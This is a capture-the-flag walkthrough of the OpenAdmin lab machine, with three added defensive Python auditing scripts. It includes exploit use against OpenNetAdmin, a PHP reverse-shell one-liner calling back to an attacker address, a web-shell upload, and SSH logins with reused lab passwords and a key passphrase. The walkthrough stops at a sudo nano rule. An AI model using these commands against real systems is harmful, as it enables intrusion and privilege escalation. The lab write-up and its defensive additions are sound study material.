Today we’re going to solve another CTF machine, OpenAdmin. It is now a retired box and is accessible to VIP members.
- Target OS: Linux
- Services: SSH, HTTP
- IP Address: 10.10.10.171
- Difficulty: Easy
- Getting user
- Getting root
As always, the first step is the reconnaissance phase: port scanning.
During this step we identify what the target is running behind the IP address (note that -oA takes an output basename before the target).
nmap -sC -sV -oA scans/10.10.10.171 10.10.10.171
By running gobuster we found the /music and /artwork directories (301 status code).
gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.171/ -s '200,204,301,302,307,403,500' -e | tee '/root/htb/10.10.10.171/scans/10.10.10.171_80_gobuster_common.txt'
If we browse to http://10.10.10.171/music and click on Login, we find that OpenNetAdmin is installed.
Let’s enumerate OpenNetAdmin and Google what it really is.
Since our target version of OpenNetAdmin is 18.1.1, we get two exploits for it.
Let’s copy it out with searchsploit -m exploits/php/webapps/47691.sh.
I tried to run the exploit and it didn’t work at first: the script had Windows line endings.
I had to run dos2unix 47691.sh
And we got a low-privilege shell.
By going through the ONA config file we found database credentials.
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
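The config block above is the kind of thing a defender wants to find before an attacker does. The following is an added example, not code from the writeup or from OpenNetAdmin: it parses a PHP config array of 'key' => 'value' pairs, reports keys that look like credentials, and flags the file if its mode lets group or other read it. The sample config is constructed from the snippet quoted above; the surrounding array structure is assumed.

```python
"""Audit a PHP config file for hardcoded credentials (added example)."""
import re
import stat
from typing import Dict, List

# Constructed sample: the database block quoted in the writeup, wrapped in an
# assumed ONA-style array structure.
SAMPLE_CONFIG = """
$ona_contexts = array(
  'DEFAULT' => array(
    'databases' => array(
      0 => array(
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
      ),
    ),
  ),
);
"""

# 'key' => 'value' where both sides are single-quoted PHP strings.
PAIR_RE = re.compile(r"'([A-Za-z0-9_]+)'\s*=>\s*'((?:[^'\\]|\\.)*)'")
SECRET_KEYS = ("passwd", "password", "secret", "token", "key")


def parse_php_pairs(text: str) -> Dict[str, str]:
    """Return the string 'key' => 'value' pairs found in a PHP config snippet."""
    return {k: v.replace("\\'", "'") for k, v in PAIR_RE.findall(text)}


def find_secrets(pairs: Dict[str, str]) -> List[str]:
    """Keys whose name suggests a credential."""
    return [k for k in pairs if any(s in k.lower() for s in SECRET_KEYS)]


def mode_is_too_open(mode: int) -> bool:
    """True if group or other can read the file (the 0o040 / 0o004 bits)."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def audit_config(text: str, mode: int) -> List[str]:
    """Findings for one config file: exposed secret keys and a lax file mode."""
    pairs = parse_php_pairs(text)
    findings = [f"secret in config: {k}" for k in find_secrets(pairs)]
    if findings and mode_is_too_open(mode):
        findings.append(f"file readable by group/other (mode {oct(mode)})")
    return findings


if __name__ == "__main__":
    # 0o644 is the usual world-readable mode web application files end up with.
    for finding in audit_config(SAMPLE_CONFIG, 0o644):
        print(finding)
```

On a real host you would read the file and pass `os.stat(path).st_mode & 0o777` as the mode; a config that holds a database password should be owned by the web server user with mode 0600, and that password should not be shared with any system account.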
Let’s try getting a proper shell first.
I tried every reverse shell (Perl, Python, bash) and none of them worked for me.
I fetched p0wny-shell with wget, uploaded it, and got a reverse shell that way.
php -r '$sock=fsockopen("10.10.14.242",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
And we got a reverse shell instantly.
Seems like we don’t have permission to either of the directories.
If you remember we had SQL database credentials, so let’s dump it.
We don’t have access to SQL, nor is a SQL dump tool installed.
The password is reused for jimmy.
Let’s SSH in as jimmy with the SQL creds we found.
ssh jimmy@10.10.10.171 (password: n1nj4W4rri0R!)
After doing some enumeration and looking for something interesting, if you take a look at main.php you’ll see it’s our way to get joanna’s SSH private key. But we don’t know where it’s hosted, so let’s take a look at the Apache config.
If you take a look at internal.conf you’ll see it’s running on port 52846. Let’s make sure that port is open to us.
Seems like it’s only opened for the local network, but luckily we’re already on the network.
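A service bound to loopback, like the internal vhost on port 52846, is still reachable by every local account on the box, so "local only" is not the same as protected. The following is an added example, not code from the writeup: it classifies the listeners in `ss -tlnp` output into network-reachable and loopback-only sockets so an administrator can review what local users can reach. The ss output is constructed; only the port 52846 Apache vhost comes from the writeup's internal.conf, the other lines are placeholders.

```python
"""Classify listening TCP sockets from `ss -tlnp` output (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed sample of `ss -tlnp` output; PIDs and most services are made up.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=900,fd=3))
LISTEN  0       511     127.0.0.1:52846      0.0.0.0:*          users:(("apache2",pid=1200,fd=4))
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=1000,fd=21))
LISTEN  0       511     *:80                 *:*                users:(("apache2",pid=1200,fd=6))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=900,fd=4))
"""

PROC_RE = re.compile(r'"([^"]+)"')           # first process name in users:((...))
Listener = Tuple[int, str, str]               # (port, local address, process or "?")


def split_addr_port(field: str) -> Tuple[str, int]:
    """'127.0.0.1:52846' -> ('127.0.0.1', 52846); also handles '[::]:22' and '*:80'."""
    addr, port = field.rsplit(":", 1)
    return addr, int(port)


def is_loopback(addr: str) -> bool:
    """True for IPv4 127.0.0.0/8 and IPv6 ::1 bindings."""
    return addr.startswith("127.") or addr in ("[::1]", "::1")


def parse_ss(text: str) -> List[Listener]:
    """Extract (port, address, process) for each LISTEN line, skipping the header."""
    listeners: List[Listener] = []
    for line in text.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue
        addr, port = split_addr_port(cols[3])
        m = PROC_RE.search(line)
        listeners.append((port, addr, m.group(1) if m else "?"))
    return listeners


def classify(text: str) -> Dict[str, List[Listener]]:
    """Split listeners into network-reachable and local-user-only sockets."""
    out: Dict[str, List[Listener]] = {"network": [], "loopback_only": []}
    for listener in parse_ss(text):
        bucket = "loopback_only" if is_loopback(listener[1]) else "network"
        out[bucket].append(listener)
    return out


if __name__ == "__main__":
    for bucket, items in classify(SAMPLE_SS).items():
        print(bucket)
        for port, addr, proc in items:
            print(f"  {addr}:{port}  {proc}")
```

Anything in the loopback_only bucket deserves the same authentication as a public service, because a foothold as any local user (here the web server account, then jimmy) puts an attacker inside that boundary.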
And we got joanna’s private SSH key.
And we got the passphrase!
Let’s SSH in as joanna.
ssh -i key joanna@10.10.10.171 (key passphrase: bloodninjas)
Now that we’re logged in as joanna, let’s do some enumeration.
If we run sudo -l, we see that
joanna can run nano on /opt/priv via sudo without a password.
Running sudo /bin/nano /opt/priv opens the nano editor.
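The sudo rule above is the kind a sudoers review should catch: a NOPASSWD rule whose target is an interactive editor gives the user far more than the ability to edit one file. The following is an added example, not code from the writeup: it parses `sudo -l` output and reports rules that run an interactive program as another account. The sample output is constructed around the rule described in the post; the hostname and the second rule are made up.

```python
"""Flag sudo rules that grant an interactive program (added example)."""
import re
from dataclasses import dataclass
from typing import List

# Constructed `sudo -l` output: the nano rule mirrors the writeup, the rest is made up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/systemctl restart apache2
"""

# Programs that give the caller an interactive session or run other commands;
# granting one via sudo is effectively granting a shell as the run-as user.
INTERACTIVE = {"nano", "vim", "vi", "less", "more", "man", "python", "python3",
               "perl", "bash", "sh", "awk", "find"}

# "(runas) TAG: TAG: command args" lines from `sudo -l`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str  # full command with arguments as listed

    @property
    def program(self) -> str:
        """Basename of the executable, e.g. 'nano' for '/bin/nano /opt/priv'."""
        return self.command.split()[0].rsplit("/", 1)[-1]


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract the rule lines from `sudo -l` output; other lines are ignored."""
    rules: List[SudoRule] = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            tags = m.group("tags").upper()
            rules.append(SudoRule(m.group("runas"), "NOPASSWD:" in tags, m.group("cmd")))
    return rules


def risky_rules(rules: List[SudoRule]) -> List[str]:
    """Findings for rules whose program is interactive; NOPASSWD rules are listed first."""
    findings = []
    for r in sorted(rules, key=lambda rule: not rule.nopasswd):
        if r.program in INTERACTIVE:
            how = "without a password" if r.nopasswd else "with password"
            findings.append(f"{r.command} as ({r.runas}) {how}: {r.program} is an "
                            "interactive program; use sudoedit for file edits instead")
    return findings


if __name__ == "__main__":
    for finding in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

The fix for the rule in the writeup is `sudoedit` (sudo -e): it copies the file, runs the editor as the invoking user, and writes the result back, so the editor process never runs as root.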